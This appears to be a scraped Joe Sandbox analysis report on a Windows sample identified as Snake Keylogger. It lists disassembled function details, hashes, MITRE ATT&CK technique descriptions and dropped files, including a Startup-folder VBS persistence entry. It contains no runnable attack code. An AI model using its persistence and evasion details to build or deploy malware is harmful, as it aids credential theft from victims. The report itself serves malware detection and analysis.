Uniqueness Score: -1.00%

Function 00180B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00180B23

Strings

AutoIt, xrefs: 00180B17
Error allocating memory., xrefs: 00180B1C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 0b36dc1185f13372517528134d89db97c47a7180d8eaa2926bf4057d8bb0e500
Instruction ID: 3a5c33386958062a1603e4682bd1c003ab232474834998dd982b33a473bef3fb
Opcode Fuzzy Hash: 0b36dc1185f13372517528134d89db97c47a7180d8eaa2926bf4057d8bb0e500
Instruction Fuzzy Hash: F8E0803224435837D21437957C47FC97B858F19F55F10042AFB58655D38FE2659047E9

Uniqueness

Uniqueness Score: -1.00%

Function 00140D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0013F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00140D71,?,?,?,0012100A), ref: 0013F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0012100A), ref: 00140D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0012100A), ref: 00140D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00140D7F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 8850cf002fa2d75976bf048d296641a0bd223c98801f2bfa83c6ffa2eef67aab
Instruction ID: 121d0e81a260060e196195ccee5f27bedfde0f5aad6fdb33a7823166e3963923
Opcode Fuzzy Hash: 8850cf002fa2d75976bf048d296641a0bd223c98801f2bfa83c6ffa2eef67aab
Instruction Fuzzy Hash: B1E092746003118BD3319FBDE9087927BE1BF18740F004A6DE586C6A61DBB5E489CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0017D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0017D220

Strings

%.3d, xrefs: 0017D22B
X64, xrefs: 0017D2A8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 9c4f5b862dc3e116b60d8e926c35c401ab2ad2a1b1380fa1d7cc9c1d7ad1f1cb
Instruction ID: 8b715349a6116cfde9d8b464d4c4ac1ee79cf0816779de215c4dd4cb2869f563
Opcode Fuzzy Hash: 9c4f5b862dc3e116b60d8e926c35c401ab2ad2a1b1380fa1d7cc9c1d7ad1f1cb
Instruction Fuzzy Hash: B1D012A1C0810CEACB9896D0EC458BEB37CBF18341F52C452F90AA1041D724C54A6761

Uniqueness

Uniqueness Score: -1.00%

Function 001B2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001B232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001B233F

Part of subcall function 0018E97B: Sleep.KERNEL32 ref: 0018E9F3

Strings

Shell_TrayWnd, xrefs: 001B2325

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c87d41dddb943784c9af8dc80b58ee8b873d517f359137d53269cecf6f6139a8
Instruction ID: 69a1a8df57e08acf065832c89b5ada8fac07bb2991c74b8b381b776ed3e38f95
Opcode Fuzzy Hash: c87d41dddb943784c9af8dc80b58ee8b873d517f359137d53269cecf6f6139a8
Instruction Fuzzy Hash: 85D0C9367D4350B6E664B7719C0FFDA7A549B14B14F004A16B685AA1D0DAE0A8818A94

Uniqueness

Uniqueness Score: -1.00%

Function 001B2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001B236C
PostMessageW.USER32(00000000), ref: 001B2373

Part of subcall function 0018E97B: Sleep.KERNEL32 ref: 0018E9F3

Strings

Shell_TrayWnd, xrefs: 001B2365

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c2db9fb792587dd2d9468330fdd1f80c523789875752ab40f1d827bf2748e16b
Instruction ID: 6d2ace6f09a07131980f4e7d6a90fdbacde3ef2f7f687cf0491bc78c968cbad3
Opcode Fuzzy Hash: c2db9fb792587dd2d9468330fdd1f80c523789875752ab40f1d827bf2748e16b
Instruction Fuzzy Hash: D2D0C9327C13507AE664B7719C0FFDA76549B14B14F404A16B685AA1D0DAE0A8818A94

Uniqueness

Uniqueness Score: -1.00%

Function 0015BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0015BE93
GetLastError.KERNEL32 ref: 0015BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0015BEFC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 7c57fd893365150a80130df5c6e4433d83d7c1b1553cdf15e65da589debf095f
Instruction ID: 0471ab87726805758aa9d8bd595cedde14e80c2ddfdc93121e0e8e9cb240b17d
Opcode Fuzzy Hash: 7c57fd893365150a80130df5c6e4433d83d7c1b1553cdf15e65da589debf095f
Instruction Fuzzy Hash: FE41E634608206EFCF258F64CC85ABA7BA4EF41312F15416AFD695F1E1DB308C09CB60

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PsBygexGwH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut1009.tmp

C:\Users\user\AppData\Local\Temp\aut1029.tmp

C:\Users\user\AppData\Local\Temp\aut1FED.tmp

C:\Users\user\AppData\Local\Temp\aut201D.tmp

C:\Users\user\AppData\Local\Temp\aut52C5.tmp

C:\Users\user\AppData\Local\Temp\aut5324.tmp

C:\Users\user\AppData\Local\Temp\contrapose

C:\Users\user\AppData\Local\Temp\troopwise

C:\Users\user\AppData\Local\directory\name.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Static File Info

Windows Analysis Report
PsBygexGwH.exe

Function 001242DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 001242A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00162BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00122CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0016065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0012344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00122B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00123170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 00158D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre